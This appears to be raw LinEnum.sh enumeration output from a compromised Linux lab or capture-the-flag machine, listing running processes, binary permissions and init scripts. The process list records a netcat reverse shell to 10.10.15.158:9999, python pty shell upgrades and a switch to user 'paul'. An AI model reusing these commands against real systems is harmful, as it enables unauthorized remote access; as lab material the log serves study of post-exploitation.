nadav      1053  0.0  0.1 212268  6496 ?        SLl  Sep22   0:00 gnome-keyring-daemon --start --components pkcs11,secrets
nadav      1072  0.0  1.2 661572 49020 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/bamf/bamfdaemon
nadav      1075  0.0  0.0  39860   324 ?        S    Sep22   0:00 upstart-dbus-bridge --daemon --session --user --bus-name session
nadav      1077  0.0  0.0  48352   396 ?        S    Sep22   0:00 upstart-file-bridge --daemon --user
nadav      1081  0.0  0.0  39860   328 ?        S    Sep22   0:00 upstart-dbus-bridge --daemon --system --user --bus-name system
nadav      1082  0.0  0.2 438772  8124 ?        Ssl  Sep22   0:00 /usr/bin/ibus-daemon --daemonize --xim --address unix:tmpdir=/tmp/ibus
nadav      1093  0.0  0.1 281588  6592 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfsd
nadav      1098  0.0  0.1 419964  7280 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes
nadav      1108  0.0  0.1 284620  7968 ?        Sl   Sep22   0:00 /usr/lib/ibus/ibus-dconf
nadav      1109  0.0  0.7 486776 30052 ?        Sl   Sep22   0:00 /usr/lib/ibus/ibus-ui-gtk3
nadav      1111  0.0  0.5 437092 22084 ?        Sl   Sep22   0:00 /usr/lib/ibus/ibus-x11 --kill-daemon
nadav      1117  0.0  0.1 353672  7876 ?        Sl   Sep22   0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
nadav      1122  0.0  0.0  42896  3996 ?        S    Sep22   0:00 /usr/bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork --print-address 3
nadav      1125  0.0  0.1 206968  5196 ?        Sl   Sep22   0:00 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
nadav      1139  0.0  0.0 173604   772 ?        Ss   Sep22   0:00 gpg-agent --homedir /home/nadav/.gnupg --use-standard-socket --daemon
nadav      1140  0.0  0.1 208752  7792 ?        Sl   Sep22   0:00 /usr/lib/ibus/ibus-engine-simple
nadav      1152  0.0  0.8 653488 35312 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/hud/hud-service
nadav      1154  0.0  0.7 870040 29388 ?        Ssl  Sep22   0:00 /usr/lib/unity-settings-daemon/unity-settings-daemon
nadav      1171  0.0  0.3 560584 15248 ?        Ssl  Sep22   0:00 /usr/lib/gnome-session/gnome-session-binary --session=ubuntu
nadav      1180  0.0  0.7 571100 28132 ?        Ssl  Sep22   0:01 /usr/lib/x86_64-linux-gnu/unity/unity-panel-service
root       1190  0.0  0.2 354204  9940 ?        Ssl  Sep22   0:00 /usr/lib/upower/upowerd
nadav      1229  0.0  0.1 178664  4796 ?        Sl   Sep22   0:00 /usr/lib/dconf/dconf-service
nadav      1237  0.0  0.2 377152  9284 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-messages/indicator-messages-service
nadav      1238  0.0  0.1 356120  7800 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-bluetooth/indicator-bluetooth-service
nadav      1239  0.0  0.2 366576  9756 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service
nadav      1240  0.0  0.4 1247640 17968 ?       Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-datetime/indicator-datetime-service
nadav      1241  0.0  0.5 664796 23984 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-keyboard/indicator-keyboard-service --use-gtk
nadav      1247  0.0  0.3 682884 12184 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service
nadav      1248  0.0  0.6 556700 24524 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-printers/indicator-printers-service
nadav      1249  0.0  0.2 512316  8444 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-session/indicator-session-service
nadav      1260  0.0  0.3 403148 12824 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service
nadav      1277  0.4  2.5 1263504 101888 ?      Ssl  Sep22   0:53 compiz
nadav      1282  0.0  0.5 990040 23776 ?        Sl   Sep22   0:00 /usr/lib/evolution/evolution-source-registry
nadav      1299  0.0  0.2 361388  8120 ?        S<l  Sep22   0:00 /usr/bin/pulseaudio --start --log-target=syslog
rtkit      1301  0.0  0.0 183544  2916 ?        SNsl Sep22   0:00 /usr/lib/rtkit/rtkit-daemon
colord     1317  0.0  0.3 320584 12892 ?        Ssl  Sep22   0:00 /usr/lib/colord/colord
nadav      1348  0.0  1.5 876996 60584 ?        Sl   Sep22   0:00 /usr/lib/evolution/evolution-calendar-factory
nadav      1352  0.0  1.0 737852 42352 ?        Sl   Sep22   0:00 nautilus -n
nadav      1354  0.0  1.8 745296 73332 ?        SLl  Sep22   0:01 /usr/bin/gnome-software --gapplication-service
nadav      1358  0.0  0.5 518432 20852 ?        Sl   Sep22   0:00 /usr/lib/unity-settings-daemon/unity-fallback-mount-helper
nadav      1359  0.2  0.8 540044 34924 ?        Sl   Sep22   0:26 /usr/bin/vmtoolsd -n vmusr --blockFd 3
nadav      1364  0.0  0.8 606840 32668 ?        Sl   Sep22   0:00 nm-applet
nadav      1366  0.0  0.4 438632 19920 ?        Sl   Sep22   0:00 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1
nadav      1382  0.0  0.2 303320  9300 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfs-udisks2-volume-monitor
root       1385  0.0  0.2 382184  9692 ?        Ssl  Sep22   0:00 /usr/lib/udisks2/udisksd --no-debug
root       1390  0.0  0.8 518648 34056 ?        Ssl  Sep22   0:01 /usr/lib/x86_64-linux-gnu/fwupd/fwupd
nadav      1401  0.0  0.1 278784  5068 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
nadav      1408  0.0  1.2 821688 51112 ?        Sl   Sep22   0:00 /usr/lib/evolution/evolution-calendar-factory-subprocess --factory contacts --bus-name org.gnome.evolution.dataserver.Subprocess.Backend.Calendarx1348x2 --own-path /org/gnome/evolution/dataserver/Subprocess/Backend/Calendar/1348/2
nadav      1412  0.0  0.2 410676  8876 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfs-afc-volume-monitor
nadav      1427  0.0  0.1 266588  4616 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfs-mtp-volume-monitor
nadav      1432  0.0  0.1 264596  4888 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfs-goa-volume-monitor
nadav      1442  0.0  0.4 704360 19400 ?        Sl   Sep22   0:00 /usr/lib/evolution/evolution-addressbook-factory
nadav      1443  0.0  1.2 1273012 51188 ?       Sl   Sep22   0:00 /usr/lib/evolution/evolution-calendar-factory-subprocess --factory local --bus-name org.gnome.evolution.dataserver.Subprocess.Backend.Calendarx1348x3 --own-path /org/gnome/evolution/dataserver/Subprocess/Backend/Calendar/1348/3
nadav      1451  0.0  0.4 779840 19324 ?        Sl   Sep22   0:00 /usr/lib/evolution/evolution-addressbook-factory-subprocess --factory local --bus-name org.gnome.evolution.dataserver.Subprocess.Backend.AddressBookx1442x2 --own-path /org/gnome/evolution/dataserver/Subprocess/Backend/AddressBook/1442/2
nadav      1498  0.0  0.2 370712  8680 ?        Sl   Sep22   0:00 /usr/lib/gvfs/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0
nadav      1550  0.0  0.6 647712 27388 ?        Ssl  Sep22   0:00 /usr/lib/x86_64-linux-gnu/unity/unity-panel-service --lockscreen-mode
whoopsie   1619  0.0  0.2 284684 11028 ?        Ssl  Sep22   0:00 /usr/bin/whoopsie -f
root       1621  0.0  0.1  65520  6224 ?        Ss   Sep22   0:00 /usr/sbin/sshd -D
root       1660  0.0  0.6 255948 26388 ?        Ss   Sep22   0:00 /usr/sbin/apache2 -k start
root       1669  0.0  0.4 889908 17932 ?        Sl   Sep22   0:08 /usr/bin/python3 /usr/bin/fail2ban-server -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -x -b
nadav      1756  0.0  0.3 506144 16048 ?        Sl   Sep22   0:00 zeitgeist-datahub
nadav      1763  0.0  0.0   4504   780 ?        S    Sep22   0:00 /bin/sh -c /usr/lib/x86_64-linux-gnu/zeitgeist/zeitgeist-maybe-vacuum; /usr/bin/zeitgeist-daemon
nadav      1770  0.0  0.1 405500  6416 ?        Sl   Sep22   0:00 /usr/bin/zeitgeist-daemon
nadav      1778  0.0  0.2 310836  9656 ?        Sl   Sep22   0:00 /usr/lib/x86_64-linux-gnu/zeitgeist-fts
nadav      1890  0.0  0.6 541476 25900 ?        Sl   Sep22   0:00 update-notifier
nadav      1910  0.0  0.2 448368  8572 ?        Sl   Sep22   0:00 /usr/lib/x86_64-linux-gnu/deja-dup/deja-dup-monitor
www-data   2012  0.0  0.3 256840 15336 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
www-data   2013  0.0  0.3 256840 15916 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
www-data   2014  0.0  0.4 260960 18064 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
www-data   2016  0.0  0.4 260960 18920 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
root       2041  0.0  0.1 100344  7580 ?        Ss   Sep22   0:00 /usr/sbin/cupsd -l
root       2042  0.0  0.2 274812  9672 ?        Ssl  Sep22   0:00 /usr/sbin/cups-browsed
lp         2046  0.0  0.1  81244  5648 ?        S    Sep22   0:00 /usr/lib/cups/notifier/dbus dbus://
www-data   2097  0.0  0.4 256800 16508 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
www-data   2142  0.0  0.3 256824 15784 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
root       2170  0.0  0.0      0     0 ?        I    Sep22   0:00 [kworker/0:1]
root       2172  0.0  0.0      0     0 ?        I    Sep22   0:00 [kworker/1:0]
www-data   2286  0.0  0.3 256808 15836 ?        S    Sep22   0:03 /usr/sbin/apache2 -k start
www-data   2292  0.0  0.0   4504   784 ?        S    Sep22   0:00 /bin/sh
www-data   2297  0.0  0.1  32480  6960 ?        S    Sep22   0:00 python -c import pty; pty.spawn('/bin/bash');
www-data   2298  0.0  0.0  18212  3284 pts/1    Ss   Sep22   0:00 /bin/bash
root       2335  0.0  0.0  51436  3108 pts/1    S    Sep22   0:00 su paul
paul       2338  0.0  0.1  45280  4752 ?        Ss   Sep22   0:00 /lib/systemd/systemd --user
paul       2339  0.0  0.0 145516  2200 ?        S    Sep22   0:00 (sd-pam)
paul       2342  0.0  0.1  29552  5300 pts/1    S    Sep22   0:00 bash
paul       2411  0.0  0.1  44920  5248 pts/1    S+   Sep22   0:00 ssh nadav@passage
root       2412  0.0  0.1  68080  6408 ?        Ss   Sep22   0:00 sshd: nadav [priv]
nadav      2414  0.0  0.0  68080  3132 ?        S    Sep22   0:00 sshd: nadav@pts/18
nadav      2415  0.0  0.1  29588  5132 pts/18   Ss+  Sep22   0:00 -bash
www-data   2693  0.0  0.3 256824 15876 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
www-data   2697  0.0  0.3 256824 15892 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
root       2911  0.0  0.1  68080  6380 ?        Ss   Sep22   0:00 sshd: paul [priv]
paul       2913  0.0  0.0  68080  3020 ?        S    Sep22   0:00 sshd: paul@pts/20
paul       2914  0.0  0.1  29564  5312 pts/20   Ss+  Sep22   0:00 -bash
www-data   2949  0.0  0.3 256824 15708 ?        S    Sep22   0:00 /usr/sbin/apache2 -k start
root       3252  0.0  0.0      0     0 ?        I    00:18   0:00 [kworker/u256:1]
root       3257  0.0  0.0      0     0 ?        I    00:20   0:00 [kworker/u256:3]
root       3269  0.0  0.1  68080  6128 ?        Ss   00:22   0:00 sshd: nadav [priv]
nadav      3271  0.0  0.0  68080  3212 ?        S    00:22   0:00 sshd: nadav@pts/19
nadav      3272  0.0  0.1  29576  5316 pts/19   Ss+  00:22   0:00 -bash
www-data  12916  0.0  0.0   4504   740 ?        S    00:26   0:00 sh -c nc -e /bin/bash 10.10.15.158 9999
www-data  12917  0.0  0.0  18024  2840 ?        S    00:26   0:00 bash
www-data  23869  0.0  0.2  36208  8756 ?        S    00:27   0:00 python3 -c import pty; pty.spawn('/bin/bash');
www-data  23885  0.0  0.0  18212  3212 pts/21   Ss   00:27   0:00 /bin/bash
root      24749  0.0  0.0  51436  3112 pts/21   S    00:28   0:00 su - paul
paul      24757  0.0  0.1  29588  5040 pts/21   S+   00:28   0:00 -su
www-data  24797  0.0  0.0      0     0 ?        Z    00:33   0:00 [sh] <defunct>
www-data  24974  0.0  0.3 256904 14992 ?        S    00:45   0:00 /usr/sbin/apache2 -k start
www-data  26442  0.0  0.0   4504   704 ?        S    00:53   0:00 sh -c /bin/sh 
www-data  26443  0.0  0.0   4504   712 ?        S    00:53   0:00 /bin/sh
www-data  26458  0.0  0.3 256792 14384 ?        S    00:54   0:00 /usr/sbin/apache2 -k start
root      26467  0.0  0.1  68080  6116 ?        Ss   00:54   0:00 sshd: paul [priv]
paul      26473  0.0  0.0  68080  3068 ?        S    00:54   0:00 sshd: paul@pts/23
root      26475  0.0  0.0      0     0 ?        I    00:54   0:00 [kworker/1:1]
paul      26476  0.1  0.1  29560  5136 pts/23   Ss   00:54   0:00 -bash
paul      26505  0.0  0.1  20580  4088 pts/23   S+   00:55   0:00 bash LinEnum.sh
paul      26506  0.1  0.0  20672  3504 pts/23   S+   00:55   0:00 bash LinEnum.sh
paul      26507  0.0  0.0  14364   752 pts/23   S+   00:55   0:00 tee -a
paul      26715  0.0  0.0  20640  2868 pts/23   S+   00:55   0:00 bash LinEnum.sh
paul      26716  0.0  0.0  44432  3400 pts/23   R+   00:55   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
1016K -rwxr-xr-x 1 root root 1014K Sep 22 21:13 /bin/bash
    0 lrwxrwxrwx 1 root root     4 Sep 22 21:13 /bin/sh -> dash
 1.6M -rwxr-xr-x 1 root root  1.6M Sep 22 21:13 /lib/systemd/systemd
 320K -rwxr-xr-x 1 root root  319K Feb 13  2019 /lib/systemd/systemd-journald
 608K -rwxr-xr-x 1 root root  605K Sep 22 21:13 /lib/systemd/systemd-logind
 140K -rwxr-xr-x 1 root root  139K Feb 13  2019 /lib/systemd/systemd-timesyncd
 444K -rwxr-xr-x 1 root root  443K Sep 22 21:13 /lib/systemd/systemd-udevd
  44K -rwxr-xr-x 1 root root   44K Sep 22 21:13 /sbin/agetty
    0 lrwxrwxrwx 1 root root    20 Sep 23 00:24 /sbin/init -> /lib/systemd/systemd
 296K -rwxr-xr-x 1 root root  296K Sep 22 21:13 /sbin/upstart
 220K -rwxr-xr-x 1 root root  219K Sep 22 21:13 /usr/bin/dbus-daemon
 688K -rwxr-xr-x 1 root root  685K Sep 22 21:13 /usr/bin/gnome-software
 164K -rwxr-xr-x 1 root root  161K Sep 22 21:13 /usr/bin/ibus-daemon
  88K -rwxr-xr-x 1 root root   87K Sep 22 21:13 /usr/bin/pulseaudio
    0 lrwxrwxrwx 1 root root     9 Sep 22 21:13 /usr/bin/python3 -> python3.5
 124K -rwxr-xr-x 1 root root  121K Sep 22 21:13 /usr/bin/VGAuthService
  48K -rwxr-xr-x 1 root root   48K Sep 22 21:13 /usr/bin/vmtoolsd
  56K -rwxr-xr-x 1 root root   56K Sep 22 21:13 /usr/bin/whoopsie
 204K -rwxr-xr-x 1 root root  202K Sep 22 21:13 /usr/bin/zeitgeist-daemon
 164K -rwxr-xr-x 1 root root  162K Sep 22 21:13 /usr/lib/accountsservice/accounts-daemon
  88K -rwxr-xr-x 1 root root   86K Sep 22 21:13 /usr/lib/at-spi2-core/at-spi2-registryd
  24K -rwxr-xr-x 1 root root   22K Sep 22 21:13 /usr/lib/at-spi2-core/at-spi-bus-launcher
 288K -rwxr-xr-x 1 root root  287K Sep 22 21:13 /usr/lib/colord/colord
  16K -rwxr-xr-x 1 root root   14K Sep 22 21:13 /usr/lib/cups/notifier/dbus
  80K -rwxr-xr-x 1 root root   77K Sep 22 21:13 /usr/lib/dconf/dconf-service
  12K -rwxr-xr-x 1 root root   11K Sep 22 21:13 /usr/lib/evolution/evolution-addressbook-factory
  16K -rwxr-xr-x 1 root root   15K Sep 22 21:13 /usr/lib/evolution/evolution-addressbook-factory-subprocess
  12K -rwxr-xr-x 1 root root   11K Sep 22 21:13 /usr/lib/evolution/evolution-calendar-factory
  16K -rwxr-xr-x 1 root root   15K Sep 22 21:13 /usr/lib/evolution/evolution-calendar-factory-subprocess
 100K -rwxr-xr-x 1 root root   99K Sep 22 21:13 /usr/lib/evolution/evolution-source-registry
 276K -rwxr-xr-x 1 root root  275K Sep 22 21:13 /usr/lib/gnome-session/gnome-session-binary
  88K -rwxr-xr-x 1 root root   85K Sep 22 21:13 /usr/lib/gvfs/gvfs-afc-volume-monitor
  32K -rwxr-xr-x 1 root root   32K Sep 22 21:13 /usr/lib/gvfs/gvfsd
  36K -rwxr-xr-x 1 root root   36K Sep 22 21:13 /usr/lib/gvfs/gvfsd-fuse
  48K -rwxr-xr-x 1 root root   48K Sep 22 21:13 /usr/lib/gvfs/gvfsd-trash
  96K -rwxr-xr-x 1 root root   93K Sep 22 21:13 /usr/lib/gvfs/gvfs-goa-volume-monitor
  92K -rwxr-xr-x 1 root root   89K Sep 22 21:13 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
  88K -rwxr-xr-x 1 root root   88K Sep 22 21:13 /usr/lib/gvfs/gvfs-mtp-volume-monitor
 164K -rwxr-xr-x 1 root root  163K Sep 22 21:13 /usr/lib/gvfs/gvfs-udisks2-volume-monitor
  20K -rwxr-xr-x 1 root root   19K Sep 22 21:13 /usr/lib/ibus/ibus-dconf
  12K -rwxr-xr-x 1 root root   11K Sep 22 21:13 /usr/lib/ibus/ibus-engine-simple
 204K -rwxr-xr-x 1 root root  202K Sep 22 21:13 /usr/lib/ibus/ibus-ui-gtk3
  92K -rwxr-xr-x 1 root root   91K Sep 22 21:13 /usr/lib/ibus/ibus-x11
  44K -rwxr-xr-x 1 root root   44K Sep 22 21:13 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1
  16K -rwxr-xr-x 1 root root   15K Sep 22 21:13 /usr/lib/policykit-1/polkitd
  64K -rwxr-xr-x 1 root root   64K Sep 22 21:13 /usr/lib/rtkit/rtkit-daemon
 348K -rwxr-xr-x 1 root root  345K Sep 22 21:13 /usr/lib/udisks2/udisksd
  40K -rwxr-xr-x 1 root root   40K Sep 22 21:13 /usr/lib/unity-settings-daemon/unity-fallback-mount-helper
  40K -rwxr-xr-x 1 root root   40K Sep 22 21:13 /usr/lib/unity-settings-daemon/unity-settings-daemon
 224K -rwxr-xr-x 1 root root  223K Sep 22 21:13 /usr/lib/upower/upowerd
 312K -rwxr-xr-x 1 root root  310K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/bamf/bamfdaemon
  24K -rwxr-xr-x 1 root root   23K Sep 22 21:15 /usr/lib/x86_64-linux-gnu/deja-dup/deja-dup-monitor
 104K -rwxr-xr-x 1 root root  103K Aug 17  2018 /usr/lib/x86_64-linux-gnu/fwupd/fwupd
 572K -rwxr-xr-x 1 root root  570K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/hud/hud-service
 228K -rwxr-xr-x 1 root root  228K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/hud/window-stack-bridge
  44K -rwxr-xr-x 1 root root   44K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service
  88K -rwxr-xr-x 1 root root   88K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-bluetooth/indicator-bluetooth-service
 1.2M -rwxr-xr-x 1 root root  1.2M Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-datetime/indicator-datetime-service
 140K -rwxr-xr-x 1 root root  137K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-keyboard/indicator-keyboard-service
 116K -rwxr-xr-x 1 root root  113K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-messages/indicator-messages-service
 168K -rwxr-xr-x 1 root root  165K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service
  56K -rwxr-xr-x 1 root root   56K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-printers/indicator-printers-service
 368K -rwxr-xr-x 1 root root  365K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-session/indicator-session-service
 304K -rwxr-xr-x 1 root root  301K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service
  76K -rwxr-xr-x 1 root root   76K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/unity/unity-panel-service
 132K -rwxr-xr-x 1 root root  129K Sep 22 21:13 /usr/lib/x86_64-linux-gnu/zeitgeist-fts
 2.4M -rwxr-xr-x 1 root root  2.4M Sep 22 21:13 /usr/lib/xorg/Xorg
  48K -rwxr-xr-x 1 root root   47K Sep 22 21:13 /usr/sbin/acpid
 632K -rwxr-xr-x 1 root root  631K Sep 22 21:13 /usr/sbin/apache2
  44K -rwxr-xr-x 1 root root   44K Sep 22 21:13 /usr/sbin/cron
 148K -rwxr-xr-x 1 root root  145K Sep 22 21:13 /usr/sbin/cups-browsed
 408K -rwxr-xr-x 1 root root  407K Sep 22 21:13 /usr/sbin/cupsd
  48K -rwxr-xr-x 1 root root   48K Sep 22 21:13 /usr/sbin/irqbalance
 252K -rwxr-xr-x 1 root root  249K Sep 22 21:13 /usr/sbin/lightdm
 2.9M -rwxr-xr-x 1 root root  2.9M Nov  2  2018 /usr/sbin/NetworkManager
 588K -rwxr-xr-x 1 root root  586K Sep 22 21:13 /usr/sbin/rsyslogd
 784K -rwxr-xr-x 1 root root  781K Sep 22 21:13 /usr/sbin/sshd


[-] /etc/init.d/ binary permissions:
total 352
drwxr-xr-x   2 root root  4096 Jul 21 10:44 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rwxr-xr-x   1 root root  2243 Feb  9  2016 acpid
-rwxr-xr-x   1 root root  5336 Apr 14  2016 alsa-utils
-rwxr-xr-x   1 root root  2014 Dec 28  2014 anacron
-rwxr-xr-x   1 root root  8087 Apr  5  2016 apache2
-rwxr-xr-x   1 root root  2210 Apr  5  2016 apache-htcacheclean
-rwxr-xr-x   1 root root  6223 Mar  3  2017 apparmor
-rwxr-xr-x   1 root root  2802 May 24  2018 apport
-rwxr-xr-x   1 root root  2401 Nov  4  2015 avahi-daemon
-rwxr-xr-x   1 root root  2968 Mar  1  2016 bluetooth
-rwxr-xr-x   1 root root  1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x   1 root root  2125 Apr 27  2016 brltty
-rwxr-xr-x   1 root root  3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x   1 root root  1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x   1 root root  9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x   1 root root  1343 Apr  4  2016 console-setup
-rwxr-xr-x   1 root root  3049 Apr  5  2016 cron
-rwxr-xr-x   1 root root  2816 Feb 13  2016 cups
-rwxr-xr-x   1 root root  1961 Feb 13  2016 cups-browsed
-rwxr-xr-x   1 root root  2813 Dec  1  2015 dbus
-rw-r--r--   1 root root  1645 Jul 21 10:44 .depend.boot
-rw-r--r--   1 root root  1368 Jul 21 10:44 .depend.start
-rw-r--r--   1 root root  1390 Jul 21 10:44 .depend.stop
-rwxr-xr-x   1 root root  1172 Oct 23  2015 dns-clean
-rwxr-xr-x   1 root root  6697 Aug  2  2015 fail2ban
-rwxr-xr-x   1 root root  1105 Jan 24  2018 grub-common
-rwxr-xr-x   1 root root  1336 Jan 19  2016 halt
-rwxr-xr-x   1 root root  1423 Jan 19  2016 hostname.sh
-rwxr-xr-x   1 root root  3809 Mar 12  2016 hwclock.sh
-rwxr-xr-x   1 root root  2372 Apr 11  2016 irqbalance
-rwxr-xr-x   1 root root  3102 Mar 10  2016 kerneloops
-rwxr-xr-x   1 root root  1804 Apr  4  2016 keyboard-setup
-rwxr-xr-x   1 root root  1300 Jan 19  2016 killprocs
-rwxr-xr-x   1 root root  2087 Dec 20  2015 kmod
-rwxr-xr-x   1 root root  3431 Mar 31  2017 lightdm
-rwxr-xr-x   1 root root   703 Jan 19  2016 mountall-bootclean.sh
-rwxr-xr-x   1 root root  2301 Jan 19  2016 mountall.sh
-rwxr-xr-x   1 root root  1461 Jan 19  2016 mountdevsubfs.sh
-rwxr-xr-x   1 root root  1564 Jan 19  2016 mountkernfs.sh
-rwxr-xr-x   1 root root   711 Jan 19  2016 mountnfs-bootclean.sh
-rwxr-xr-x   1 root root  2456 Jan 19  2016 mountnfs.sh
-rwxr-xr-x   1 root root  4771 Jul 19  2015 networking
-rwxr-xr-x   1 root root  1757 Jan 11  2017 network-manager
-rwxr-xr-x   1 root root  1581 Oct 15  2015 ondemand
-rwxr-xr-x   1 root root  1846 Mar 22  2018 open-vm-tools
-rwxr-xr-x   1 root root  1366 Nov 15  2015 plymouth
-rwxr-xr-x   1 root root   752 Nov 15  2015 plymouth-log
-rwxr-xr-x   1 root root   612 Jan 27  2016 pppd-dns
-rwxr-xr-x   1 root root  1192 Sep  5  2015 procps
-rwxr-xr-x   1 root root  6366 Jan 19  2016 rc
-rwxr-xr-x   1 root root   820 Jan 19  2016 rc.local
-rwxr-xr-x   1 root root   117 Jan 19  2016 rcS
-rw-r--r--   1 root root  2427 Jan 19  2016 README
-rwxr-xr-x   1 root root   661 Jan 19  2016 reboot
-rwxr-xr-x   1 root root  4149 Nov 23  2015 resolvconf
-rwxr-xr-x   1 root root  4355 Jul 10  2014 rsync
-rwxr-xr-x   1 root root  2796 Feb  3  2016 rsyslog
-rwxr-xr-x   1 root root  2522 Jul  9  2015 saned
-rwxr-xr-x   1 root root  3927 Jan 19  2016 sendsigs
-rwxr-xr-x   1 root root   597 Jan 19  2016 single
-rw-r--r--   1 root root  1087 Jan 19  2016 skeleton
-rwxr-xr-x   1 root root  2117 Feb 18  2016 speech-dispatcher
-rwxr-xr-x   1 root root  4077 Apr 13  2016 ssh
-rwxr-xr-x   1 root root  1154 Jan 29  2016 thermald
-rwxr-xr-x   1 root root  6087 Apr 12  2016 udev
-rwxr-xr-x   1 root root  2049 Aug  7  2014 ufw
-rwxr-xr-x   1 root root  2737 Jan 19  2016 umountfs
-rwxr-xr-x   1 root root  2202 Jan 19  2016 umountnfs.sh
-rwxr-xr-x   1 root root  1879 Jan 19  2016 umountroot
-rwxr-xr-x   1 root root  1391 Apr 20  2017 unattended-upgrades
-rwxr-xr-x   1 root root  3111 Jan 19  2016 urandom
-rwxr-xr-x   1 root root  1306 May 16  2018 uuidd
-rwxr-xr-x   1 root root   485 Jun 15  2016 whoopsie
-rwxr-xr-x   1 root root  2757 Jan 19  2017 x11-common


[-] /etc/init/ config file permissions:
total 368
drwxr-xr-x   2 root root  4096 Jul 21 10:44 .
drwxr-xr-x 134 root root 12288 Jul 21 10:45 ..
-rw-r--r--   1 root root   338 Apr  8  2016 acpid.conf
-rw-r--r--   1 root root   309 Apr 14  2016 alsa-utils.conf
-rw-r--r--   1 root root   278 Dec 28  2014 anacron.conf
-rw-r--r--   1 root root  3709 Mar  3  2017 apparmor.conf
-rw-r--r--   1 root root  1629 May 24  2018 apport.conf
-rw-r--r--   1 root root   207 Nov 24  2015 avahi-cups-reload.conf
-rw-r--r--   1 root root   541 Nov 24  2015 avahi-daemon.conf
-rw-r--r--   1 root root   997 Mar  1  2016 bluetooth.conf
-rw-r--r--   1 root root   328 Nov 18  2014 bootmisc.sh.conf
-rw-r--r--   1 root root   232 Nov 18  2014 checkfs.sh.conf
-rw-r--r--   1 root root   253 Nov 18  2014 checkroot-bootclean.sh.conf
-rw-r--r--   1 root root   307 Nov 18  2014 checkroot.sh.conf
-rw-r--r--   1 root root   266 May 19  2016 console.conf
-rw-r--r--   1 root root   250 Apr  4  2016 console-font.conf
-rw-r--r--   1 root root   509 Apr  4  2016 console-setup.conf
-rw-r--r--   1 root root  1122 May 19  2016 container-detect.conf
-rw-r--r--   1 root root   356 May 19  2016 control-alt-delete.conf
-rw-r--r--   1 root root   297 Apr  5  2016 cron.conf
-rw-r--r--   1 root root   525 May  7  2018 cups-browsed.conf
-rw-r--r--   1 root root  1815 Dec 12  2018 cups.conf
-rw-r--r--   1 root root   482 Sep  1  2015 dbus.conf
-rw-r--r--   1 root root  1377 May 19  2016 failsafe.conf
-rw-r--r--   1 root root   374 Aug 19  2016 failsafe-x.conf
-rw-r--r--   1 root root   267 May 19  2016 flush-early-job-log.conf
-rw-r--r--   1 root root  1247 Jun  1  2015 friendly-recovery.conf
-rw-r--r--   1 root root   186 Jan  3  2018 gpu-manager.conf
-rw-r--r--   1 root root   284 Jul 23  2013 hostname.conf
-rw-r--r--   1 root root   300 May 21  2014 hostname.sh.conf
-rw-r--r--   1 root root   674 Mar 14  2016 hwclock.conf
-rw-r--r--   1 root root   561 Mar 14  2016 hwclock-save.conf
-rw-r--r--   1 root root   109 Mar 14  2016 hwclock.sh.conf
-rw-r--r--   1 root root   597 Apr 11  2016 irqbalance.conf
-rw-r--r--   1 root root   689 Aug 20  2015 kmod.conf
-rw-r--r--   1 root root  1444 Mar 31  2017 lightdm.conf
-rw-r--r--   1 root root   268 Nov 18  2014 mountall-bootclean.sh.conf
-rw-r--r--   1 root root  1232 Nov 18  2014 mountall.conf
-rw-r--r--   1 root root   349 Nov 18  2014 mountall-net.conf
